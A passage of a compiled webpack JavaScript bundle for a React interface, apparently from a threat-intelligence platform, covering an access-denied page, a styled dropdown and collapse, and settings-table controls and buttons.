  The `FeatureNotEnabledView` is a 404-type page for displaying a warning message
  when a user tries accessing a page which they do not have permission to view.
*/

var Container = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'FeatureNotEnabledView__Container',
  componentId: 'sc-1mr8l2f-0'
})(['padding:2rem;']);

var FeatureVerificationComponent = function FeatureVerificationComponent() {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    Container,
    null,
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'h4',
      null,
      'Verifying Access'
    ),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'p',
      null,
      'Verifying your account has access to the requested feature.'
    )
  );
};

var AccessDeniedComponent = function AccessDeniedComponent() {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    Container,
    null,
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'h4',
      null,
      'Access Denied'
    ),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'p',
      null,
      'The feature you have requested to access is not enabled for your account. Please contact your account administrator.'
    )
  );
};

var FeatureNotEnabledView = function FeatureNotEnabledView() {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(AccessDeniedComponent, null);
};

/* unused harmony default export */ var _unused_webpack_default_export = (FeatureNotEnabledView);

/***/ }),
/* 1493 */,
/* 1494 */,
/* 1495 */,
/* 1496 */,
/* 1497 */,
/* 1498 */,
/* 1499 */,
/* 1500 */,
/* 1501 */,
/* 1502 */,
/* 1503 */,
/* 1504 */,
/* 1505 */,
/* 1506 */,
/* 1507 */,
/* 1508 */,
/* 1509 */,
/* 1510 */,
/* 1511 */,
/* 1512 */,
/* 1513 */,
/* 1514 */,
/* 1515 */,
/* 1516 */,
/* 1517 */,
/* 1518 */,
/* 1519 */,
/* 1520 */,
/* 1521 */,
/* 1522 */,
/* 1523 */,
/* 1524 */,
/* 1525 */,
/* 1526 */,
/* 1527 */,
/* 1528 */,
/* 1529 */,
/* 1530 */,
/* 1531 */,
/* 1532 */,
/* 1533 */,
/* 1534 */,
/* 1535 */,
/* 1536 */,
/* 1537 */,
/* 1538 */,
/* 1539 */,
/* 1540 */,
/* 1541 */,
/* 1542 */,
/* 1543 */,
/* 1544 */,
/* 1545 */,
/* 1546 */,
/* 1547 */,
/* 1548 */,
/* 1549 */,
/* 1550 */,
/* 1551 */,
/* 1552 */,
/* 1553 */,
/* 1554 */,
/* 1555 */,
/* 1556 */,
/* 1557 */,
/* 1558 */,
/* 1559 */,
/* 1560 */,
/* 1561 */,
/* 1562 */,
/* 1563 */,
/* 1564 */,
/* 1565 */,
/* 1566 */,
/* 1567 */,
/* 1568 */,
/* 1569 */,
/* 1570 */,
/* 1571 */,
/* 1572 */,
/* 1573 */,
/* 1574 */,
/* 1575 */,
/* 1576 */,
/* 1577 */,
/* 1578 */,
/* 1579 */,
/* 1580 */,
/* 1581 */,
/* 1582 */,
/* 1583 */,
/* 1584 */,
/* 1585 */,
/* 1586 */,
/* 1587 */,
/* 1588 */,
/* 1589 */,
/* 1590 */,
/* 1591 */,
/* 1592 */,
/* 1593 */,
/* 1594 */,
/* 1595 */,
/* 1596 */,
/* 1597 */,
/* 1598 */,
/* 1599 */,
/* 1600 */,
/* 1601 */,
/* 1602 */,
/* 1603 */,
/* 1604 */,
/* 1605 */,
/* 1606 */,
/* 1607 */,
/* 1608 */,
/* 1609 */,
/* 1610 */,
/* 1611 */,
/* 1612 */,
/* 1613 */,
/* 1614 */,
/* 1615 */,
/* 1616 */,
/* 1617 */,
/* 1618 */,
/* 1619 */,
/* 1620 */,
/* 1621 */,
/* 1622 */,
/* 1623 */,
/* 1624 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__Icons_js__ = __webpack_require__(803);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["a"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["b"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["c"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "e", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["d"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "f", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["e"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "g", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["f"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "h", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["g"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "i", function() { return __WEBPACK_IMPORTED_MODULE_0__Icons_js__["h"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__LogoSplunkTS_js__ = __webpack_require__(3664);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_1__LogoSplunkTS_js__["a"]; });



/***/ }),
/* 1625 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__TagList__ = __webpack_require__(3550);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__BaseTag__ = __webpack_require__(3551);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_1__BaseTag__["a"]; });



/***/ }),
/* 1626 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Collapse; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reactstrap__ = __webpack_require__(59);



/**
 * This component is us taking Reactstrap collapse, and providing the
 * bootstrap styles our selves so we have no dependencies **/

var Collapse = Object(__WEBPACK_IMPORTED_MODULE_0_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_1_reactstrap__["Collapse"]).withConfig({
  displayName: "PureCollapse__Collapse",
  componentId: "sc-10srtd8-0"
})(["&&{transition:all .2s ease-in-out;transition:height .35s ease;", ";.fade{transition:opacity .15s linear;&:not(.show){opacity:0;}}&.collapse:not(.show){display:none;}&.collapsing{position:relative;height:0;overflow:hidden;}}"], function (_ref) {
  var removeMarginFromChildren = _ref.removeMarginFromChildren;
  return removeMarginFromChildren !== false && Object(__WEBPACK_IMPORTED_MODULE_0_styled_components__["b" /* css */])(["> div{margin-top:0;margin-bottom:0;}"]);
});

/***/ }),
/* 1627 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return StandardDropdown; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return StyledDropdownMenu; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return StyledDropdownItem; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_types__ = __webpack_require__(97);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_2_0_themes__ = __webpack_require__(77);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }








// Types Merged with Reactstrap and converted to Flow


var initialValues = {
  // theme: DefaultTheme, This overrides everything
};

// Style
var sizes = { wide: '14rem', slim: '6rem' };
var StyledDropdown = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["Dropdown"]).withConfig({
  displayName: 'Dropdown__StyledDropdown',
  componentId: 'sc-1o2fnct-0'
})(['&&{display:inline-block;font-size:', ';background-color:', ';color:', ';padding:0.5rem;border:1px solid ', ';cursor:pointer;user-select:none;position:relative;.dropdown-text{width:', ';margin-right:0.5rem;}', ' .dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:10rem;padding:0.5rem 0;margin:0.125rem 0 0;font-size:1rem;color:#212529;text-align:left;list-style:none;background-color:', ';background-clip:padding-box;border:1px solid rgba(0,0,0,0.15);border-radius:0.25rem;&.show{display:block;}}}'], function (_ref) {
  var theme = _ref.theme;
  return theme.FontSizes.P;
}, function (_ref2) {
  var theme = _ref2.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref3) {
  var theme = _ref3.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref4) {
  var theme = _ref4.theme,
      borderless = _ref4.borderless;
  return borderless ? 'transparent' : theme.ThemeColors.BORDER.hex;
}, function (_ref5) {
  var size = _ref5.size;

  if (size) {
    return sizes[size] ? sizes[size] : size + 'rem';
  } else {
    return 'inherit';
  }
}, function (props) {
  return props.disabled && Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['opacity:0.5;background-color:', ';pointer-events:none;cursor:default;'], function (_ref6) {
    var theme = _ref6.theme;
    return theme.ThemeColors.SURFACE.X700;
  } /* TODO: SHADES_OF_BLACK_50 */);
}, function (_ref7) {
  var theme = _ref7.theme;
  return theme.ThemeColors.SURFACE.hex;
});

var StyledDropdownToggle = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["DropdownToggle"]).withConfig({
  displayName: 'Dropdown__StyledDropdownToggle',
  componentId: 'sc-1o2fnct-1'
})(['display:flex;align-items:center;justify-content:space-between;i{margin-right:0.1rem;}']);

var StyledDropdownMenu = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["DropdownMenu"]).withConfig({
  displayName: 'Dropdown__StyledDropdownMenu',
  componentId: 'sc-1o2fnct-2'
})(['']);
StyledDropdownMenu.defaultProps = initialValues;

var StyledDropdownItem = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["DropdownItem"]).withConfig({
  displayName: 'Dropdown__StyledDropdownItem',
  componentId: 'sc-1o2fnct-3'
})(['&&{font-size:', ';background-color:', ';color:', ';user-select:none;:hover{background-color:', ';color:', ';}:active,:focus{background-color:', ';border:initial;outline:0;color:', ';}display:block;width:100%;padding:0.25rem 1.5rem;clear:both;text-align:inherit;white-space:nowrap;border:0;}'], function (_ref8) {
  var theme = _ref8.theme;
  return theme.FontSizes.P;
}, function (_ref9) {
  var theme = _ref9.theme;
  return theme.ThemeColors.SURFACE.hex;
}, function (_ref10) {
  var theme = _ref10.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref11) {
  var theme = _ref11.theme;
  return theme.ThemeColors.SEARCH_BAR.X500;
}, function (_ref12) {
  var theme = _ref12.theme;
  return theme.ThemeColors.TEXT.hex;
}, function (_ref13) {
  var theme = _ref13.theme;
  return theme.ThemeColors.SURFACE.X50;
} /* TODO: SHADES_OF_BLACK_50 */, function (_ref14) {
  var theme = _ref14.theme;
  return theme.ThemeColors.TEXT.hex;
});
StyledDropdownItem.defaultProps = initialValues;

var StandardDropdown = function (_Component) {
  _inherits(StandardDropdown, _Component);

  function StandardDropdown() {
    var _ref15;

    var _temp, _this, _ret;

    _classCallCheck(this, StandardDropdown);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref15 = StandardDropdown.__proto__ || Object.getPrototypeOf(StandardDropdown)).call.apply(_ref15, [this].concat(args))), _this), _this.state = {
      dropdownOpen: false // TODO: Initial Values
    }, _this.toggle = function () {
      _this.setState(function (prevState) {
        return {
          dropdownOpen: !prevState.dropdownOpen
        };
      });
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(StandardDropdown, [{
    key: 'render',


    //  ----Template----

    value: function render() {
      var dropdownOpen = this.state.dropdownOpen;


      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledDropdown,
        _extends({}, this.props, { isOpen: dropdownOpen, disabled: this.props.disabled, toggle: this.toggle }),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          StyledDropdownToggle,
          { disabled: this.props.disabled, tag: 'div' },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'span',
            { className: 'dropdown-text' },
            this.props.selected || this.props.placeholder || 'Select',
            ' '
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_3_trustar_2_0_components__["o" /* Icon */], { icon: __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_components__["s" /* IconLookup */].CHEVRON_DOWN })
        ),
        this.props.children
      );
    }

    // ----Methods----

  }]);

  return StandardDropdown;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

// $FlowFixMe: Weird error.


StandardDropdown.defaultProps = initialValues;



/***/ }),
/* 1628 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return getTableHeight; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return getSortArrow; });
/* unused harmony export RenderTitleCell */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return RenderPatternCell; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return RenderDescriptionCell; });
/* unused harmony export RenderPlainCell */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return SettingsColumn; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return TableControls; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return TableManageButtons; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return SettingsTable; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils_constants__ = __webpack_require__(559);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_trustar_components__ = __webpack_require__(295);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__ = __webpack_require__(96);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_companies__ = __webpack_require__(402);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_rxjs_util_noop__ = __webpack_require__(251);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10_rxjs_util_noop___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_10_rxjs_util_noop__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__Table_styl__ = __webpack_require__(3626);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__Table_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_11__Table_styl__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_redux_form_immutable__ = __webpack_require__(180);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_redux_form_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_12_redux_form_immutable__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }














var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_11__Table_styl___default.a);

/**
 * A special select menu that will fetch all companies when focused. This way it
 * will be able to display all companies rather than just whatever page was most
 * recently fetched
 */
var CompanySelect = Object(__WEBPACK_IMPORTED_MODULE_9_modules_companies__["connectSelect"])(__WEBPACK_IMPORTED_MODULE_5_trustar_components__["q" /* Select */]);

var headerHeight = 85;
var controlsHeight = 60;
var tableHeaderHeight = 65;
var tableOffset = headerHeight + controlsHeight + tableHeaderHeight;
var getTableHeight = function getTableHeight() {
  return window.innerHeight - tableOffset;
};

/* Determine sort arrow for any column which can sort */
var getSortArrow = function getSortArrow(order) {
  var upArrow = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', {
    style: { marginLeft: 2 },
    className: 'fa fa-arrow-up',
    'aria-hidden': 'true'
  });
  var downArrow = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', {
    style: { marginLeft: 2 },
    className: 'fa fa-arrow-down',
    'aria-hidden': 'true'
  });
  return order === __WEBPACK_IMPORTED_MODULE_3_trustar_utils_constants__["a" /* ASC */] ? upArrow : downArrow;
};

/* Render a title text field */
var RenderTitleCell = function RenderTitleCell(content) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'p',
    { className: cx('ColumnTitle') },
    content
  );
};

var RenderPatternCell = function RenderPatternCell(pattern, showText) {
  switch (pattern) {
    case 'COMMUNITY':
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { key: pattern, className: cx('fa fa-globe', 'green') }),
        showText && ' Community'
      );
    case 'OPEN':
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { key: pattern, className: cx('fa fa-rss', 'yellow') }),
        showText && ' Open Source'
      );
    case 'CLOSED_CONCRETE':
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { key: pattern, className: cx('fa fa-search-plus', 'gray') }),
        showText && ' Closed Source'
      );
    case 'INTERNAL':
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { key: pattern, className: cx('fa fa-lock', 'gray') }),
        'Company Internal'
      );
    case 'OTHER':
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'span',
        null,
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { key: pattern, className: cx('fa fa-question') }),
        'Other'
      );
    default:
      return null;
  }
};

var RenderDescriptionCell = function RenderDescriptionCell(text) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'p',
    null,
    text ? Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils_utils_js__["truncateText"])({ text: text, length: 100 }) : __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'em',
      null,
      ' None.'
    )
  );
};

/* Render a plain text field */
var RenderPlainCell = function RenderPlainCell(content) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'p',
    null,
    content
  );
};

// Shell component for agregating table column props:
var SettingsColumn = function (_React$Component) {
  _inherits(SettingsColumn, _React$Component);

  function SettingsColumn() {
    _classCallCheck(this, SettingsColumn);

    return _possibleConstructorReturn(this, (SettingsColumn.__proto__ || Object.getPrototypeOf(SettingsColumn)).apply(this, arguments));
  }

  _createClass(SettingsColumn, [{
    key: 'render',
    value: function render() {
      return null;
    } // Component merely provides props to <SettingsTable />

  }]);

  return SettingsColumn;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/* Control Buttons for Table */
var TableControls = function (_React$Component2) {
  _inherits(TableControls, _React$Component2);

  function TableControls() {
    _classCallCheck(this, TableControls);

    return _possibleConstructorReturn(this, (TableControls.__proto__ || Object.getPrototypeOf(TableControls)).apply(this, arguments));
  }

  _createClass(TableControls, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          entity = _props.entity,
          handleAdd = _props.handleAdd,
          showFilter = _props.showFilter,
          customTableInfo = _props.customTableInfo,
          viewOptions = _props.viewOptions,
          onChangeSearch = _props.onChangeSearch,
          handleImport = _props.handleImport,
          handleExport = _props.handleExport,
          rolesOptions = _props.rolesOptions,
          enclaveOptions = _props.enclaveOptions,
          onEnclaveFilterInput = _props.onEnclaveFilterInput,
          searchPlaceholder = _props.searchPlaceholder,
          showCompanySelect = _props.showCompanySelect;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        { 'data-cy': 'table', className: cx('TableControls') },
        customTableInfo && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('CustomTableInfo') },
          customTableInfo
        ),
        onChangeSearch && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__["y" /* SearchBar */], {
          onChange: onChangeSearch,
          className: cx('search'),
          placeholder: searchPlaceholder ? searchPlaceholder : 'Search',
          value: viewOptions && viewOptions.has('query') && viewOptions.get('query')
        }),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["b" /* ButtonGroup */],
          { style: { marginLeft: '0.5rem' } },
          handleImport && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["a" /* Button */],
            {
              title: 'Bulk Import',
              onClick: handleImport,
              fill: 'outline'
            },
            'Bulk Import'
          ),
          handleExport && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["a" /* Button */],
            {
              title: 'Export All',
              onClick: handleExport,
              buttonType: 'tertiary'
            },
            'Export All'
          ),
          handleAdd && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            __WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["a" /* Button */],
            { 'data-cy': 'add-' + entity.toLowerCase().replace(/\s/g, '-') + '-button', onClick: handleAdd },
            'Add ',
            entity
          )
        ),
        showFilter && // NOTE: Filter is hidden for non-Admins
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('SortControls') },
          showCompanySelect && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(CompanySelect, {
            className: cx('Select'),
            value: this.props.companyFilterValue,
            onChange: this.props.handleFilterCompany,
            placeholder: this.props.companyFilterPlaceholder
          }),
          enclaveOptions && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5_trustar_components__["q" /* Select */], {
            className: cx('Select'),
            options: enclaveOptions,
            value: this.props.enclaveFilterValue,
            onChange: this.props.handleFilterEnclave,
            onInputChange: function onInputChange(inputValue) {
              return onEnclaveFilterInput ? onEnclaveFilterInput(inputValue) : __WEBPACK_IMPORTED_MODULE_10_rxjs_util_noop__["noop"];
            },
            placeholder: this.props.enclaveFilterPlaceholder
          }),
          rolesOptions && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_5_trustar_components__["q" /* Select */], {
            className: cx('RolesSelect'),
            options: rolesOptions,
            value: this.props.rolesFilterValue,
            onChange: this.props.handleFilterRoles,
            placeholder: this.props.rolesFilterPlaceholder
          })
        )
      );
    }
  }]);

  return TableControls;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

var StyledTableCellButtonGroup = Object(__WEBPACK_IMPORTED_MODULE_8_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["b" /* ButtonGroup */]).withConfig({
  displayName: 'Table__StyledTableCellButtonGroup',
  componentId: 'xql2h8-0'
})(['padding-top:5px;']);

/* Manage Buttons for Table: supports Edit, Delete, and Deactivate (users) */
var TableManageButtons = function (_React$Component3) {
  _inherits(TableManageButtons, _React$Component3);

  function TableManageButtons() {
    _classCallCheck(this, TableManageButtons);

    return _possibleConstructorReturn(this, (TableManageButtons.__proto__ || Object.getPrototypeOf(TableManageButtons)).apply(this, arguments));
  }

  _createClass(TableManageButtons, [{
    key: 'render',
    value: function render() {
      var _props2 = this.props,
          guid = _props2.guid,
          id = _props2.id,
          email = _props2.email,
          handleEdit = _props2.handleEdit,
          handleDelete = _props2.handleDelete,
          handleDeactivate = _props2.handleDeactivate;

      var identifier = guid == null ? id : guid;
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        StyledTableCellButtonGroup,
        null,
        handleEdit && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["e" /* IconButtonPure */], {
          title: 'Edit',
          cyid: 'editItem',
          transparent: true,
          fill: 'none',
          small: true,
          glowHover: true,
          icon: __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__["s" /* IconLookup */].PENCIL,
          onClick: function onClick() {
            return handleEdit(identifier);
          }
        }),
        handleDeactivate && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["e" /* IconButtonPure */], {
          title: 'Activate / Deactivate',
          transparent: true,
          cyid: 'toggleActiveState',
          glowHover: true,
          fill: 'none',
          small: true,
          icon: __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__["s" /* IconLookup */].USER_MINUS,
          onClick: function onClick() {
            return handleDeactivate(email);
          }
        }),
        handleDelete && __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_6_trustar_2_0_components_Button__["e" /* IconButtonPure */], {
          title: 'Delete',
          cyid: 'deleteItem',
          transparent: true,
          glowHover: true,
          fill: 'none',
          small: true,
          icon: __WEBPACK_IMPORTED_MODULE_7_trustar_2_0_components__["s" /* IconLookup */].TRASH2,
          onClick: function onClick() {
            return handleDelete(identifier);
          }
        })
      );
    }
  }]);

  return TableManageButtons;
